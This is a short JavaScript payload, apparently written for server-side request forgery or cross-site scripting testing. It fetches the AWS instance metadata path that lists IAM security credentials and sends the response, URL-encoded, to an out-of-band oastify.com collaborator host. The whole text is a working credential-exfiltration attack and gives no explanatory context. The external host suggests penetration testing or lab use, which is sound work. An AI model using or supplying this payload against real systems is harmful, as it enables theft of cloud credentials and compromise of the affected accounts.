x = new XMLHttpRequest();
x.onload = function() {
    l = new XMLHttpRequest();
    l.open("GET", "http://59cdx93r42n1wcpy3wzs3vi7lyrrfh36.oastify.com/" + encodeURIComponent(this.responseText));
    l.send();
};
x.open("GET", "http://169.254.169.254/latest/meta-data/iam/security-credentials/");
x.send();